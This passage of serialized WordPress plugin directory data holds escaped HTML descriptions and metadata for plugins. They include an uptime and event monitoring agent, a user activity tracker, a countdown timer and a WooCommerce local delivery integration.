WordPress events, and monitor SSL certificates – all from a beautiful dashboard.\u003C\u002Fp>\n\u003Ch4>Key Features\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Cstrong>Real-Time Uptime Monitoring\u003C\u002Fstrong> – Automated health checks every minute\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Event Tracking\u003C\u002Fstrong> – Track user logins, plugin changes, theme updates, and more\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Error Monitoring\u003C\u002Fstrong> – Catch PHP errors and warnings before they impact users\u003C\u002Fli>\n\u003Cli>\u003Cstrong>SSL Certificate Monitoring\u003C\u002Fstrong> – Get alerts 7 days before expiration\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Email Alerts\u003C\u002Fstrong> – Instant notifications for critical issues\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Beautiful Dashboard\u003C\u002Fstrong> – Monitor all your sites from one place\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Free Plan Available\u003C\u002Fstrong> – Start monitoring for free, upgrade anytime\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>How It Works\u003C\u002Fh4>\n\u003Col>\n\u003Cli>Install and activate the Incident Agent plugin\u003C\u002Fli>\n\u003Cli>Sign up for free at \u003Ca href=\"https:\u002F\u002Fapp.incidentwp.com\" rel=\"nofollow ugc\">app.incidentwp.com\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Connect your site using the provided API key\u003C\u002Fli>\n\u003Cli>Start monitoring immediately!\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Ch4>What Gets Tracked\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>User logins and logouts\u003C\u002Fli>\n\u003Cli>Failed login attempts\u003C\u002Fli>\n\u003Cli>Plugin installations, updates, and deletions\u003C\u002Fli>\n\u003Cli>Theme changes and updates\u003C\u002Fli>\n\u003Cli>WordPress core updates\u003C\u002Fli>\n\u003Cli>Post and page changes\u003C\u002Fli>\n\u003Cli>User profile updates\u003C\u002Fli>\n\u003Cli>Settings changes\u003C\u002Fli>\n\u003Cli>And much more!\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Free vs Pro\u003C\u002Fh4>\n\u003Cp>This plugin is free and open source (GPL-2.0-or-later). A \u003Cstrong>Pro plan\u003C\u002Fstrong> is available at \u003Ca href=\"https:\u002F\u002Fincidentwp.com\" rel=\"nofollow ugc\">incidentwp.com\u003C\u002Fa> and unlocks additional features such as extended event history, multi-site management, advanced alerting, and priority support. The free version is fully functional and does not require a paid plan.\u003C\u002Fp>\n\u003Ch4>Privacy & Security\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>All data transmitted over HTTPS\u003C\u002Fli>\n\u003Cli>API key authentication\u003C\u002Fli>\n\u003Cli>No sensitive data stored\u003C\u002Fli>\n\u003Cli>GDPR compliant\u003C\u002Fli>\n\u003Cli>Open source code\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Documentation\u003C\u002Fh4>\n\u003Cp>Full documentation is available at \u003Ca href=\"https:\u002F\u002Fincidentwp.com\u002Fdocs\u002F\" rel=\"nofollow ugc\">incidentwp.com\u002Fdocs\u002F\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch4>Support\u003C\u002Fh4>\n\u003Cp>Need help? Visit our \u003Ca href=\"https:\u002F\u002Fincidentwp.com\u002Fdocs\u002F\" rel=\"nofollow ugc\">documentation\u003C\u002Fa> or email support@incidentwp.com\u003C\u002Fp>\n\u003Ch3>Privacy Policy\u003C\u002Fh3>\n\u003Cp>Incident Agent collects and transmits WordPress event data to the IncidentWP monitoring platform. This includes:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Site URL and WordPress version\u003C\u002Fli>\n\u003Cli>Plugin and theme information\u003C\u002Fli>\n\u003Cli>User activity (logins, logouts, profile changes)\u003C\u002Fli>\n\u003Cli>Error logs and PHP warnings\u003C\u002Fli>\n\u003Cli>Uptime and performance metrics\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>No personally identifiable information (PII) such as passwords, email content, or payment details is collected or transmitted.\u003C\u002Fp>\n\u003Cp>For more information, visit our \u003Ca href=\"https:\u002F\u002Fapp.incidentwp.com\u002Fprivacy\" rel=\"nofollow ugc\">Privacy Policy\u003C\u002Fa>\u003C\u002Fp>\n","Complete WordPress monitoring with real-time alerts, error tracking, and uptime monitoring. Know about issues before your users do.",166,"2026-03-19T17:08:00.000Z","5.0","7.4",[176,156,21,177,178],"alerts","security","uptime","https:\u002F\u002Fincidentwp.com\u002Fdocs\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fincident-agent.1.0.3.zip",{"slug":182,"name":183,"version":184,"author":185,"author_profile":186,"description":187,"short_description":188,"active_installs":189,"downloaded":190,"rating":191,"num_ratings":192,"last_updated":193,"tested_up_to":16,"requires_at_least":194,"requires_php":195,"tags":196,"homepage":202,"download_link":203,"security_score":204,"vuln_count":205,"unpatched_count":29,"last_vuln_date":206,"fetched_at":31},"user-activity-tracking-and-log","User Activity Tracking and Log","4.2.1","Moove Agency","https:\u002F\u002Fprofiles.wordpress.org\u002Fmooveagency\u002F","\u003Cp>\u003Cstrong>Track user activity & duration on your website with this incredibly powerful, easy-to-use and well supported plugin.\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>This plugin is privacy-friendly: it stores no cookies on users’ computers and therefore requires no cookie opt-in from users (unlike Google Analytics or Google Tag Manager).\u003C\u002Fp>\n\u003Cp>The plugin is especially useful for tracking users on membership sites, \u003Cstrong>LMS online learning systems\u003C\u002Fstrong> or \u003Cstrong>WooCommerce\u003C\u002Fstrong> sites. It can track both \u003Cstrong>logged-in\u003C\u002Fstrong> and \u003Cstrong>anonymous users\u003C\u002Fstrong>.\u003C\u002Fp>\n\u003Cp>You can track \u003Cstrong>page visits\u003C\u002Fstrong>, \u003Cstrong>duration of the visit\u003C\u002Fstrong>, \u003Cstrong>login and logout time\u003C\u002Fstrong>, and you can even setup \u003Cstrong>event goal triggers\u003C\u002Fstrong> too (ie. click of a button, PDF download, mailto links and more).\u003C\u002Fp>\n\u003Cp>Our plugin will accurately track time spent on specific pages which is very useful when you’d like to monitor user’s reading time, video watching time, tracking time in LMS online learning system, or how long users look at your e-commerce product pages before purchasing.\u003C\u002Fp>\n\u003Ch3>Key Features\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Simple & intuitive\u003C\u002Fli>\n\u003Cli>Powerful search, export options, API endpoints\u003C\u002Fli>\n\u003Cli>Compatible with WooCommerce and other user registration plugins\u003C\u002Fli>\n\u003Cli>Tracks both logged-in and non logged-in users (ie. unknown users)\u003C\u002Fli>\n\u003Cli>GDPR \u002F CCPA \u002F privacy ready (IP address can be stored in anonymized format)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Privacy-friendly\u003C\u002Fstrong>: stores no cookies on users’ computers \u003C\u002Fli>\n\u003Cli>\u003Cstrong>Local Data Storage\u003C\u002Fstrong>: all user data is stored locally on your website only; we do not collect or store any of your user data on our servers\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Premium Features\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>Time tracking & Session Duration\u003C\u002Fstrong>: see the duration of user visits in the activity logs\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Login\u002Flogout time\u003C\u002Fstrong>: see the exact time when users login and logout from your site\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Event goal tracking\u003C\u002Fstrong>: setup event goal triggers for various actions that users take on your site (ie. click on a specific button, PDF download, mailto links and more)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>[NEW] Email notifications\u003C\u002Fstrong>: receive email notifications when an event was triggered \u003C\u002Fli>\n\u003Cli>\u003Cstrong>Auto logout\u003C\u002Fstrong>: setup automatic logout for idle users to improve your analytics\u003C\u002Fli>\n\u003Cli>Track all \u003Cstrong>custom post-types and archives\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Anonymize\u003C\u002Fstrong> IP addresses\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Export logs to CSV\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Track specific roles\u003C\u002Fstrong>: track logged-in users only or only certain roles such as subscribers \u003C\u002Fli>\n\u003Cli>\u003Cstrong>Rest API endpoints\u003C\u002Fstrong> for activity logs in JSON format\u003C\u002Fli>\n\u003Cli>Custom timezone\u003C\u002Fli>\n\u003Cli>Advanced Filters \u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwww.mooveagency.com\u002Fwordpress-plugins\u002Fuser-activity-tracking-and-log\u002F\" rel=\"nofollow ugc\">Download the Premium Add-on here\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Demo Video\u003C\u002Fh3>\n\u003Cdiv class=\"embed-vimeo\" style=\"text-align: center;\">\u003Ciframe loading=\"lazy\" src=\"https:\u002F\u002Fplayer.vimeo.com\u002Fvideo\u002F305493827\" width=\"750\" height=\"422\" frameborder=\"0\" webkitallowfullscreen mozallowfullscreen allowfullscreen>\u003C\u002Fiframe>\u003C\u002Fdiv>\n\u003Ch3>Event Triggers Video Tutorial\u003C\u002Fh3>\n\u003Cdiv class=\"embed-vimeo\" style=\"text-align: center;\">\u003Ciframe loading=\"lazy\" src=\"https:\u002F\u002Fplayer.vimeo.com\u002Fvideo\u002F551423323\" width=\"750\" height=\"422\" frameborder=\"0\" webkitallowfullscreen mozallowfullscreen allowfullscreen>\u003C\u002Fiframe>\u003C\u002Fdiv>\n\u003Ch3>Activity data that will be logged:\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>Login date and time\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Logout date and time\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Last seen\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Session Duration\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Username & email\u003C\u002Fstrong> (if user is logged-in)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>User role\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Activity\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Page name and URL\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>IP address\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Location\u003C\u002Fstrong> (by IP Address)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Referrer URL\u003C\u002Fstrong>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Testimonials\u003C\u002Fh3>\n\u003Cp>★★★★★\u003C\u002Fp>\n\u003Cblockquote>\n\u003Cp>“Tried many, but this one had just what I wanted. I like this plugins feature set, minimal but exactly what I need to see. Helps me to send offers on a WooCommerce digital content site when I notice users are looking at a particular product often, but not purchasing. A little nudge helps and this plugin puts that info in a place I can easily see.” – \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Ftopic\u002Ftried-many-but-this-one-had-just-what-i-wanted\u002F\" rel=\"ugc\">Ryan\u003C\u002Fa>\u003C\u002Fp>\n\u003C\u002Fblockquote>\n\u003Cp>★★★★★\u003C\u002Fp>\n\u003Cblockquote>\n\u003Cp>“Simple to install & performs well. The reporting is clear and very useful!” – \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Ftopic\u002Fsimple-to-install-performs-well\u002F\" rel=\"ugc\">hannahfinch\u003C\u002Fa>\u003C\u002Fp>\n\u003C\u002Fblockquote>\n\u003Cp>★★★★★\u003C\u002Fp>\n\u003Cblockquote>\n\u003Cp>“Very useful plugin!! I was looking for something to track users on our website. This plugin is exactly what I needed. You can track activity and users. You can see who visited which pages, and the referring page they came from. The premium version gives you even more useful features like tracking only users who are logged in, additional view options, and so on. Excellent plugin, highly recommended!!” – \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Ftopic\u002Fvery-useful-plugin-771\u002F\" rel=\"ugc\">msiciliano\u003C\u002Fa>\u003C\u002Fp>\n\u003C\u002Fblockquote>\n\u003Ch3>About us\u003C\u002Fh3>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwww.mooveagency.com\u002F\" rel=\"nofollow ugc\">Moove Agency\u003C\u002Fa> is a premium supplier of quality WordPress plugins, services and support. \u003Ca href=\"https:\u002F\u002Fwww.mooveagency.com\u002Fwordpress-plugins\u002F\" rel=\"nofollow ugc\">Visit our site\u003C\u002Fa> to learn more.\u003C\u002Fp>\n","Track time and monitor user activity & history on your website, LMS online learning system, membership or WooCommerce site.",3000,143239,70,33,"2026-01-22T09:22:00.000Z","4.3","5.6",[197,198,199,200,201],"activity-log","analytics","statistics","stats","time-tracking","http:\u002F\u002Fwww.mooveagency.com","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fuser-activity-tracking-and-log.4.2.1.zip",99,2,"2024-01-29 00:00:00",{"slug":208,"name":209,"version":210,"author":211,"author_profile":212,"description":213,"short_description":214,"active_installs":215,"downloaded":216,"rating":13,"num_ratings":217,"last_updated":218,"tested_up_to":16,"requires_at_least":219,"requires_php":220,"tags":221,"homepage":18,"download_link":225,"security_score":13,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"simple-countdown","Simple Countdown Timer","1.0.4","GrandPlugins","https:\u002F\u002Fprofiles.wordpress.org\u002Fgrandplugins\u002F","\u003Cp>Simple Countdown Timer Plugin allows you to easily create and customize countdown timers for your website. Whether you’re counting down to a sale, event, or launch, our plugin makes it simple to add a countdown timer to any page or post. With a variety of customization options.\u003C\u002Fp>\n\u003Ch3>Features\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Quick Countdwon Timers: generate a timer with a single click.\u003C\u002Fli>\n\u003Cli>Custom Countdown Timers.\u003C\u002Fli>\n\u003Cli>Timer Title.\u003C\u002Fli>\n\u003Cli>Timer Titel Tag.\u003C\u002Fli>\n\u003Cli>Timer Complete Text.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>For more features and more control\u003C\u002Fh3>\n\u003Cp>👉 \u003Cstrong>\u003Ca href=\"https:\u002F\u002Fgrandplugins.com\u002Fproduct\u002Fsimple-countdown-timer\u002F?utm_source=wp\" rel=\"nofollow ugc\">Premium\u003C\u002Fa>\u003C\u002Fstrong> | \u003Cstrong>\u003Ca href=\"https:\u002F\u002Fdemo.grandplugins.com\u002Fsimple-countdown\u002Ftimers-demo\u002F\" rel=\"nofollow ugc\">Demo\u003C\u002Fa>\u003C\u002Fstrong> 👈\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Custom Timezone per timer.\u003C\u002Fli>\n\u003Cli>Redirect URL after timer is completed.\u003C\u002Fli>\n\u003Cli>Custom Timer colors.\u003C\u002Fli>\n\u003Cli>Timer subscribe Form.\u003C\u002Fli>\n\u003Cli>Timer subscription List.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Check Our other plugins\u003C\u002Fh3>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fgrandplugins.com\u002Fproduct\u002Fwp-db-controller\u002F?utm_source=free&utm_medium=simple-countdown\" rel=\"nofollow ugc\">WB DB Controller\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fgrandplugins.com\u002Fproduct\u002Fwoo-conditional-gateways\u002F?utm_source=free&utm_medium=simple-countdown\" rel=\"nofollow ugc\">Woo Conditional Gateways\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fgrandplugins.com\u002Fproduct\u002Fwoo-order-splitter\u002F?utm_source=free&utm_medium=simple-countdown\" rel=\"nofollow ugc\">Woo Order Splitter\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fgrandplugins.com\u002Fproduct\u002Fwoo-instock-notifier\u002F?utm_source=free&utm_medium=simple-countdown\" rel=\"nofollow ugc\">Woo instock Notifier\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fgrandplugins.com\u002Fproduct\u002Fwoo-gift-cards\u002F?utm_source=free&utm_medium=simple-countdown\" rel=\"nofollow ugc\">Woo Gift Cards\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fgrandplugins.com\u002Fproduct\u002Fwoo-restrict-orders\u002F?utm_source=free&utm_medium=simple-countdown\" rel=\"nofollow ugc\">Woo Restrict Orders\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fgrandplugins.com\u002Fproduct\u002Fwoo-bulk-price-change\u002F?utm_source=free&utm_medium=simple-countdown\" rel=\"nofollow ugc\">Woo Bulk Price & Stock Manager\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fgrandplugins.com\u002Fproduct\u002Fwoo-variation-sold-individually\u002F?utm_source=free&utm_medium=simple-countdown\" rel=\"nofollow ugc\">Woo Variation Sold individually\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fgrandplugins.com\u002Fproduct\u002Fwoo-paddle-checkout\u002F?utm_source=free&utm_medium=simple-countdown\" rel=\"nofollow ugc\">Woo Paddle Checkout\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fgrandplugins.com\u002Fproduct\u002Fwoo-sales-notification\u002F?utm_source=free&utm_medium=simple-countdown\" rel=\"nofollow ugc\">Woo Sales notifications\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fgrandplugins.com\u002Fproduct\u002Fwoo-cart-tracker\u002F?utm_source=free&utm_medium=simple-countdown\" rel=\"nofollow ugc\">Woo Real time Cart Tracker\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fgrandplugins.com\u002Fproduct\u002Fwoo-best-seller\u002F?utm_source=free&utm_medium=simple-countdown\" rel=\"nofollow ugc\">Woo Best Sellers\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fgrandplugins.com\u002Fproduct\u002Fwoo-advanced-captcha\u002F?utm_source=free&utm_medium=simple-countdown\" rel=\"nofollow ugc\">Advanced Captcha\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fgrandplugins.com\u002Fproduct\u002Fwoo-advanced-add-to-cart\u002F?utm_source=free&utm_medium=simple-countdown\" rel=\"nofollow ugc\">WooCommerce Advanced Bundles\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fgrandplugins.com\u002Fproduct\u002Fwoo-advanced-pricing\u002F?utm_source=free&utm_medium=simple-countdown\" rel=\"nofollow ugc\">WooCommerce Advanced Pricing – Discounts & Quantity Swatches\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fimage-sizes-controller\u002F\" rel=\"ugc\">Image Sizes Controller\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fcart-limiter\u002F\" rel=\"ugc\">WooCommerce Cart Limiter\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fwatermark-images-for-wp-and-woo-grandpluginswp\u002F\" rel=\"ugc\">WP Watermark Images\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fcoming-soon-products-for-woocommerce\" rel=\"ugc\">Coming Soon Products for WooCommerce\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fcart-limiter\u002F\" rel=\"ugc\">WooCommerce Cart and Order Limiter\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fwatermark-pdf\u002F\" rel=\"ugc\">Watermark PDF\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fquick-view-and-buy-now-for-woocommerce\u002F\" rel=\"ugc\">Quick View and Buy Now for WooCommerce\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fultimate-maintenance-mode-for-woocommerce\u002F\" rel=\"ugc\">WooCommerce Maintenance Mode\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fsidebars-blocks\u002F\" rel=\"ugc\">Sidebars Gutenberg Blocks\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Flarge-images-uploader\u002F\" rel=\"ugc\">Large Images Uploader\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fultimate-maintenance-mode-for-woocommerce\u002F\" rel=\"ugc\">Maintenance Mode for WooCommerce\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fajax-single-add-to-cart-for-woocommerce\u002F\" rel=\"ugc\">Single Ajax Add to Cart For WooCommerce\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fgif-uploader-wp-grandplugins\" rel=\"ugc\">GIF Uploader\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fpdf-password-protect\u002F\" rel=\"ugc\">PDF Password Protect\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fgpls-paypal-subscriptions\u002F\" rel=\"ugc\">Paypal Subscriptions\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwpplugincreator.com\" rel=\"nofollow ugc\">WP Plugin Creator\u003C\u002Fa>\u003C\u002Fp>\n","Simple Countdown Timer Plugin allows you to easily create and customize countdown timers for your website. Whether you're counting down to a sale …",1000,13308,1,"2026-01-28T10:47:00.000Z","5.3.0","7.0.0",[222,223,201,224],"countdown","countdown-timer","timer","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsimple-countdown.zip",{"slug":227,"name":228,"version":229,"author":230,"author_profile":231,"description":232,"short_description":233,"active_installs":234,"downloaded":235,"rating":236,"num_ratings":28,"last_updated":237,"tested_up_to":16,"requires_at_least":238,"requires_php":174,"tags":239,"homepage":245,"download_link":246,"security_score":13,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"shipday-for-woocommerce","Shipday Local Delivery for WooCommerce","2.3.1","shipdayinc","https:\u002F\u002Fprofiles.wordpress.org\u002Fshipdayinc\u002F","\u003Cp>Support fast, efficient, and affordable local deliveries for your WooCommerce store with Shipday. Our intuitive mobile apps and web dashboard make it easy for you to automatically dispatch on-demand or scheduled orders, identify the best delivery route, and track drivers in real time.\u003C\u002Fp>\n\u003Cp>You can use your own delivery drivers or leverage a third-party delivery service like \u003Cstrong>DoorDash\u003C\u002Fstrong> and \u003Cstrong>Uber\u003C\u002Fstrong> (only available in the US)—all from one unified platform. It’s free to start and works anywhere in the world with internet connectivity.\u003C\u002Fp>\n\u003Cp>Shipday integrates directly with WooCommerce. When a customer places a delivery order on your WooCommerce store, the order is automatically sent to Shipday for dispatch, route planning, and live delivery tracking. We support both single-vendor stores and multi-vendor marketplaces built with \u003Cstrong>Dokan\u003C\u002Fstrong> and \u003Cstrong>WCFM\u003C\u002Fstrong>.\u003C\u002Fp>\n\u003Ch3>Delivery date & time slots on the checkout page\u003C\u002Fh3>\n\u003Cp>Give your customers full control over \u003Cstrong>when\u003C\u002Fstrong> they receive their order.\u003C\u002Fp>\n\u003Cp>With Shipday’s datetime configuration, now you can show a \u003Cstrong>delivery date and time slot selector directly on the WooCommerce checkout page\u003C\u002Fstrong>. Customers simply pick an available delivery day and time window before placing their order, and their selection is sent to Shipday together with the order details.\u003C\u002Fp>\n\u003Cp>As a merchant, you can:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Configure which \u003Cstrong>days of the week\u003C\u002Fstrong> are available for delivery (e.g. weekdays only, or specific days).\u003C\u002Fli>\n\u003Cli>Define flexible \u003Cstrong>time slots\u003C\u002Fstrong> (e.g. 10:00 AM – 11:00 AM, 12:00 PM – 03:00 PM, etc.).\u003C\u002Fli>\n\u003Cli>Manage everything through a \u003Cstrong>simple calendar-style UI\u003C\u002Fstrong>, without touching code.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>👉 \u003Cstrong>This delivery date & time slot functionality is included for free with Shipday – there is no additional charge to use it.\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>If you already use a dedicated date\u002Ftime plugin, Shipday is also compatible with popular WooCommerce date and time picker solutions, so you can keep your existing checkout UX and still benefit from real-time dispatch and tracking via Shipday.\u003C\u002Fp>\n\u003Ch3>Ideal for fast local delivery\u003C\u002Fh3>\n\u003Cp>Shipday is ideal for managing fast on-demand or scheduled deliveries for your online business, including:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Restaurant delivery\u003C\u002Fli>\n\u003Cli>Prepared meal delivery\u003C\u002Fli>\n\u003Cli>Quick convenience delivery\u003C\u002Fli>\n\u003Cli>Grocery delivery\u003C\u002Fli>\n\u003Cli>15-minute \u002F rapid grocery delivery\u003C\u002Fli>\n\u003Cli>Pharmacy delivery\u003C\u002Fli>\n\u003Cli>Other food deliveries\u003C\u002Fli>\n\u003Cli>Flower delivery\u003C\u002Fli>\n\u003Cli>Local courier delivery\u003C\u002Fli>\n\u003Cli>And many other local delivery use cases we see every day\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Key benefits\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\n\u003Cp>\u003Cstrong>All-in-one dispatch app\u003C\u002Fstrong>\u003Cbr \u002F>\nView incoming orders with pickup and delivery information, automatically or manually dispatch drivers, and see real-time driver locations on a live map.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>Easy driver management with the driver app\u003C\u002Fstrong>\u003Cbr \u002F>\nWith the Shipday driver app, drivers receive order notifications instantly, navigate to pickup and drop-off, communicate with customers via text or phone, and capture proof of delivery with photos or signatures.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>Real-time delivery tracking for customers\u003C\u002Fstrong>\u003Cbr \u002F>\nShipday sends customers a live delivery tracking link via SMS, so they can follow their driver on a map and see up-to-the-minute ETAs—reducing “Where is my order?” calls and improving customer satisfaction.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>Flexible delivery setup\u003C\u002Fstrong>\u003Cbr \u002F>\nUse only your own drivers, only third-party fleets (like DoorDash or Uber in supported regions), or a mix of both—Shipday helps you orchestrate everything from one place.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Works with your favorite WooCommerce plugins\u003C\u002Fh3>\n\u003Cp>Currently we are compatible with the following plugins (among others):\u003C\u002Fp>\n\u003Cp>👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fwoocommerce\u002F\" rel=\"ugc\">WooCommerce\u003C\u002Fa>\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Ffood-store\u002F\" rel=\"ugc\">Food Store – Online Food Delivery & Pickup\u003C\u002Fa>\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fdokan-lite\u002F\" rel=\"ugc\">Dokan\u003C\u002Fa>\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fwc-multivendor-marketplace\u002F\" rel=\"ugc\">WCFM Marketplace\u003C\u002Fa>\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fwoo-delivery\u002F\" rel=\"ugc\">Delivery & Pickup Date Time for WooCommerce\u003C\u002Fa>\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Forder-delivery-date-for-woocommerce\u002F\" rel=\"ugc\">Order Delivery Date for WooCommerce\u003C\u002Fa>\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwww.woodeliveryarea.com\u002F\" rel=\"nofollow ugc\">WooCommerce Delivery Area Pro\u003C\u002Fa> – for delivery date & time only.\u003C\u002Fp>\n\u003Ch3>What is Shipday?\u003C\u002Fh3>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwww.shipday.com\u002F\" rel=\"nofollow ugc\">Shipday\u003C\u002Fa> is an all-in-one local delivery platform used by thousands of businesses in 50+ countries. It helps you automate local deliveries in minutes with:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Real-time 